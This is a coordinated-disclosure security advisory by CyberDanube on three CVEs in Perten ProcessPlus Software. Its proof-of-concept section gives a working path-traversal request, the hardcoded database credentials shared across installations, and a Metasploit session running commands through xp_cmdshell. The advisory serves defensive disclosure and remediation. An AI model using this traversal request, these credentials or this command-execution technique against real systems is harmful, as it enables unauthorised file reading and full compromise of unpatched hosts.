Perten Instruments Process Plus Software 1.11.6507.0 LFI / Hardcoded Credentials

CyberDanube Security Research 20240722-0-------------------------------------------------------------------------------                title| Multiple Vulnerabilities              product| Perten Instruments Process Plus Software   vulnerable version| <=1.11.6507.0        fixed version| 2.0.0           CVE number| CVE-2024-6911, CVE-2024-6912, CVE-2024-6913               impact| High             homepage| https://perkinelmer.com                found| 2024-04-24                   by| S. Dietz, T. Weber (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"For 85 years, PerkinElmer has pushed the boundaries of science from food tohealth to the environment. We’ve always pursued science with a clear purpose –to help our customers achieve theirs. Our expert team brings technology andintangibles, like creativity, empathy, diligence, and a spirit ofcollaboration, in equal measure, to fulfill our customers’ desire to workbetter, innovate better, and create better.PerkinElmer is a leading, global provider of technology and service solutionsthat help customers measure, quantify, detect, and report in ways that helpensure the quality, safety, and satisfaction of their products."Source: https://www.perkinelmer.com/Vulnerable versions-------------------------------------------------------------------------------ProcessPlus Software / <=1.11.6507.0Vulnerability overview-------------------------------------------------------------------------------1) Unauthenticated Local File Inclusion (CVE-2024-6911)A LFI was identified in the web interface of the device. An attacker can usethis vulnerability to read system-wide files and configuration.2) Hardcoded MSSQL Credentials (CVE-2024-6912)The software is using the same MSSQL credentials across multiple installations.In combination with 3), this allows an attacker to fully compromise the host.3) Execution with Unnecessary Privileges (CVE-2024-6913)The software uses the user "sa" to connect to the database. Access to thisaccount allows an attacker to execute commands via the "xp_cmdshell" procedure.Proof of Concept-------------------------------------------------------------------------------1) Unauthenticated Local File Inclusion (CVE-2024-6911)The LFI can be triggered by using the following GET Request:-------------------------------------------------------------------------------GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1Host: 192.168.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: closeUpgrade-Insecure-Requests: 1-------------------------------------------------------------------------------This example returns the content from "C:\Windows\System32\drivers\etc\hosts"of an affected installation.2) Hardcoded MSSQL Credentials (CVE-2024-6912)Analysis across multiple installations show that the configuration file"\ProgramData\Perten\ProcessPlus\OPCDA_SERVER.xml" contains credentials:-------------------------------------------------------------------------------[...]<OPCDA_Server dbconnectstring="Driver={SQL Server};SERVER=.\PertenSQL;DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno" application_id="1"appid="Perten.OPCDA.Server" loglevel="info"logfile="C:\Perten\ProcessPlus\Log\opcserver.log">[...]-------------------------------------------------------------------------------These credentials "sa:enilno" were re-used in all reviewed installations.3) Execution with Unnecessary Privileges (CVE-2024-6913)The application uses the "sa" user to authenticate with the database. By usingMetasploit an attacker can execute arbitrary commands:-------------------------------------------------------------------------------msf6 auxiliary(admin/mssql/mssql_exec) > show optionsModule options (auxiliary/admin/mssql/mssql_exec):   Name                 Current Setting   ----                 ---------------   CMD                  dir   PASSWORD             enilno   RHOSTS               192.168.0.1   RPORT                1433   TDSENCRYPTION        false   TECHNIQUE            xp_cmdshell   USERNAME             sa   USE_WINDOWS_AUTHENT  falsemsf6 auxiliary(admin/mssql/mssql_exec) > run[*] Running module against 192.168.0.1[*] 192.168.0.1:1433 - SQL Query: EXEC master..xp_cmdshell 'dir'[...] Directory of C:\Windows\system32 01/23/2024  13:37 AM    <DIR>          . 01/23/2024  13:37 AM    <DIR>          .. 01/23/2024  13:37 AM    <DIR>          0123 01/23/2024  13:37 AM    <DIR>          0123 01/23/2024  13:37 AM               232 @AppHelpToast.png 01/23/2024  13:37 AM               308 @AudioToastIcon.png[...]Solution-------------------------------------------------------------------------------Update to version 2.0.0.Workaround-------------------------------------------------------------------------------Restrict network access to the host with the installed software. Change thedefault credentials of the database in the config file and the database itself.Recommendation-------------------------------------------------------------------------------CyberDanube recommends Perten customers to upgrade the software to the latestversion available and to restrict network access to the management interface.Contact Timeline-------------------------------------------------------------------------------2024-04-29: Contacting PerkinElmer via [email protected]: Vendor asked for unencrypted advisory.2024-05-16: Sent advisory to vendor.2024-05-22: Asked for status update. No answer.2024-05-28: Asked for status update. Contact stated that they are working on a            fix.2024-06-10: Asked for status update. Contact stated that all issues should be            fixed by end of month. Local file inclusion should be fixed in            version 1.16. Asked for a release date of version 1.16. No answer.2024-07-13: Asked for status update.2024-07-15: Contact stated, that all three issues have been fixed in version            2.0.0 which have been released on 2024-07-11.2024-07-16: Asked for a link to the firmware update release.2024-07-17: Set release date to 2024-07-22.2024-07-22: Coordinated release of security advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF S. Dietz, T. Weber / @2024